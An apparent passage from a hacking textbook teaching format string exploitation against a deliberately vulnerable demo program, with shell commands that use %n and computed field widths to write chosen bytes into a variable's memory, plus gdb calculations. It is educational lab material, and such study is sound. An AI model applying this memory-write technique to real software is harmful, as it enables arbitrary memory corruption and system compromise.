Graphics Programs Reference
In-Depth Information
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 420 0x000001a4
r eader@hacking:~/booksrc $
By manipulating the field-width option of one of the format parameters
before the %n , a certain number of blank spaces can be inserted, resulting in
the output having some blank lines. These lines, in turn, can be used to
control the number of bytes written before the %n format parameter. This
approach will work for small numbers, but it won't work for larger ones, like
memory addresses.
Looking at the hexadecimal representation of the test_val value, it's
apparent that the least significant byte can be controlled fairly well. (Remember
that the least significant byte is actually located in the first byte of the four-
byte word of memory.) This detail can be used to write an entire address.
If four writes are done at sequential memory addresses, the least significant
byte can be written to each byte of a four-byte word, as shown here:
Memory 94 95 96 97
First write to 0x08049794
AA 00 00 00
Second write to 0x08049795
BB 00 00 00
Third write to 0x08049796
CC 00 00 00
Fourth write to 0x08049797
DD 00 00 00
Result
AA BB CC DD
As an example, let's try to write the address 0xDDCCBBAA into the test
variable. In memory, the first byte of the test variable should be 0xAA , then 0xBB ,
then 0xCC , and finally 0xDD . Four separate writes to the memory addresses
0x08049794 , 0x08049795 , 0x08049796 , and 0x08049797 should accomplish this.
The first write will write the value 0x000000aa , the second 0x000000bb , the third
0x000000cc , and finally 0x000000dd .
The first write should be easy.
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??%x%x%8x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc 0
[*] test_val @ 0x08049794 = 28 0x0000001c
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xaa - 28 + 8
$1 = 150
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%150x%n
The right way to print user-controlled input:
??%x%x%150x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa
r eader@hacking:~/booksrc $
Search WWH ::




Custom Search